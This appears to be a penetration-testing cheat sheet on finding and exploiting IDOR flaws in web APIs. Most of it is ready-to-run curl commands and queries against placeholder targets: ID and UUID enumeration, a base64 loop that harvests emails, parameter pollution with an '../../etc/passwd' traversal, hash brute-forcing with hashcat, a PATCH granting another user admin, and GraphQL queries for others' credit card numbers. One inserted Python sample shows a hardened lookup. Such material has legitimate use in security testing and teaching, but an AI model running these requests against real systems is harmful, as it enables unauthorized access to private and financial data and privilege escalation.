Identifying IDORs

Simple Parameter Manipulation

```bash
# Numeric ID increment
curl -u user1:pass1 http://api.target.com/v1/users/123/profile
curl -u user1:pass1 http://api.target.com/v1/users/124/profile

# UUID/hash prediction
curl -u user1:pass1 http://api.target.com/v1/users/550e8400-e29b-41d4-a716-446655440000/profile
curl -u user1:pass1 http://api.target.com/v1/users/550e8400-e29b-41d4-a716-446655440001/profile
```

Parameter Pollution

```bash
# Multiple ID parameters
curl "http://target.com/download?file_id=legit123&file_id=admin456"
curl "http://target.com/api?user_id=valid123&user_id=victim789"
```

AJAX Calls

```javascript
function changeUserPassword() {
    $.ajax({
        url: "change_password.php",
        type: "post",
        dataType: "json",
        // uid and is_admin are supplied by the client, so the server must not trust them
        data: {uid: user.uid, password: user.password, is_admin: is_admin},
        success: function(result) {
            // handle response
        }
    });
}
```

Understand Hashing/Encoding

```javascript
$.ajax({
    url: "download.php",
    type: "post",
    dataType: "json",
    // the filename is only an MD5 of a predictable name; hashing is not a secret
    data: {filename: CryptoJS.MD5('file_1.pdf').toString()},
    success: function(result) {
        // handle response
    }
});
```

Compare User Roles

```json
{
  "attributes": {
    "type": "salary",
    "url": "/services/data/salaries/users/1"
  },
  "Id": "1",
  "Name": "User1"
}
```

IDOR Enumeration

Basic ID Enumeration

Numeric ID Increment/Decrement

```bash
# Example: User profile access
curl "https://target.com/api/user/101"   # Valid request (your account)
curl "https://target.com/api/user/102"   # Check another user
curl "https://target.com/api/user/100"   # Check previous ID
curl "https://target.com/api/user/099"   # Leading zero test
```

UUID/GUID Manipulation

```bash
# Predictable UUIDs (v1/v2) can be brute-forced
curl "https://target.com/api/invoice/550e8400-e29b-41d4-a716-446655440000"
curl "https://target.com/api/invoice/550e8400-e29b-41d4-a716-446655440001"
```

Hash Cracking (If IDs Are Obfuscated)

```bash
# If IDs look like hashes (e.g., `d4d4d4d4`), try:
curl "https://target.com/api/doc/d4d4d4d4"  # Original
curl "https://target.com/api/doc/a1b2c3d4"  # Brute-force attempt
```

Parameter Fuzzing

Changing Parameter Names

```bash
# Try different parameter names:
curl "https://target.com/profile?id=100"
curl "https://target.com/profile?user_id=100"
curl "https://target.com/profile?uid=100"
curl "https://target.com/profile?account=100"
```

HTTP Parameter Pollution (HPP)

```bash
# Supply multiple parameters to confuse access control
curl "https://target.com/download?file=legit.pdf&file=../../etc/passwd"
curl "https://target.com/api?user=alice&user=bob"
```

Bypassing Encoded/Obscured IDs

Base64-Encoded IDs

```bash
# Example: /user/MTIz (where "MTIz" = Base64 of "123")
echo -n "123" | base64  # Returns "MTIz" (-n: without it the trailing newline is encoded too)
curl "https://target.com/api/user/MTIz"  # Original
curl "https://target.com/api/user/MTI0"  # Incremented (124)
```

```bash
for i in {100..110}; do
    encoded=$(echo -n "$i" | base64 | tr -d '\n')
    curl -s "https://target.com/api/user/$encoded" | grep "email"
done
```
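The two weaknesses above, a duplicated `user_id` that confuses the access check and a base64 form that is treated as if it were authorization, shown as a weak lookup beside its hardened form. This is an added example, not code from the original page; `RECORDS`, `decode_id`, `vulnerable_lookup` and `hardened_lookup` are constructed for illustration.

```python
import base64
import binascii
from typing import Optional
from urllib.parse import parse_qs

# Constructed sample store for this example: object id -> owner and data.
RECORDS = {
    "101": {"owner": "alice", "email": "alice@example.test"},
    "102": {"owner": "bob", "email": "bob@example.test"},
}


def decode_id(raw: str) -> Optional[str]:
    """Server-side decoding of the base64 id form (/user/MTIz -> "123").
    Encoding is only transport; it grants no authorization by itself."""
    try:
        return base64.b64decode(raw, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def vulnerable_lookup(query: str, session_user: str) -> Optional[dict]:
    """The HPP weakness: the access check reads the first user_id value
    while the data layer reads the last one, so two values slip through."""
    ids = parse_qs(query).get("user_id", [])
    if not ids:
        return None
    checked = RECORDS.get(decode_id(ids[0]) or "")
    if checked is None or checked["owner"] != session_user:
        return None                                # ownership verified on ids[0] ...
    return RECORDS.get(decode_id(ids[-1]) or "")   # ... but data fetched by ids[-1]


def hardened_lookup(query: str, session_user: str) -> Optional[dict]:
    """Object-level authorization on exactly the value that is fetched."""
    ids = parse_qs(query).get("user_id", [])
    if len(ids) != 1:                    # refuse duplicated parameters outright
        return None
    record = RECORDS.get(decode_id(ids[0]) or "")
    if record is None or record["owner"] != session_user:
        return None                      # the checked id is the fetched id
    return record
```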

Hashed IDs (MD5, SHA1, etc.)

```bash
# If user_id looks like a hash (e.g., "5f4dcc3b5aa765d61d8327deb882cf99" = MD5("password"))
echo -n "101" | md5sum | cut -d' ' -f1  # Returns hash of "101"
curl "https://target.com/api/user/$(echo -n '102' | md5sum | cut -d' ' -f1)"
```

```bash
hashcat -m 0 -a 3 "5f4dcc3b5aa765d61d8327deb882cf99" ?d?d?d  # Brute-force 3-digit MD5
```

Custom Encoding (e.g., XOR, Bit-Shifting)

```python
# If user_id=246 corresponds to real_id=118 (246 = 118*2 + 10)
real_id = (246 - 10) // 2  # Returns 118
```

IDOR in Insecure APIs

REST API IDOR

```bash
# Numeric ID increment
curl "https://api.target.com/v1/users/101"
curl "https://api.target.com/v1/users/102"

# UUID manipulation
curl "https://api.target.com/v1/invoices/550e8400-e29b-41d4-a716-446655440000"
curl "https://api.target.com/v1/invoices/550e8400-e29b-41d4-a716-446655440001"

# Using PUT/PATCH to modify other users (JSON body needs the matching Content-Type)
curl -X PATCH "https://api.target.com/v1/users/102" \
     -H "Content-Type: application/json" -d '{"role":"admin"}'
```

GraphQL IDOR

```graphql
# Query other users' data
query {
  user(id: "encoded_user_id_here") {
    email
    creditCards { number }
  }
}

# Batch query attack
query {
  user1: user(id: "encoded_id_1") { email }
  user2: user(id: "encoded_id_2") { email }
}
```

SOAP API IDOR (XML)

```xml
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetUserDetails>
      <userId>ENCODED_ID_HERE</userId>
    </GetUserDetails>
  </soap:Body>
</soap:Envelope>
```

Bypassing Protections

Swapping HTTP Methods

```bash
# If GET is blocked, try POST
curl -X POST "https://target.com/api/user/ENCODED_ID"
```

Adding Headers (API Key Spoofing)

```bash
curl -H "X-API-Key: 12345" "https://target.com/api/user/ENCODED_ID"
```

Parameter Pollution

```bash
# If `user_id` is checked, try `account_id`, `uid`, etc.
curl "https://target.com/api/data?user_id=VALID_ID&account_id=VICTIM_ID"
```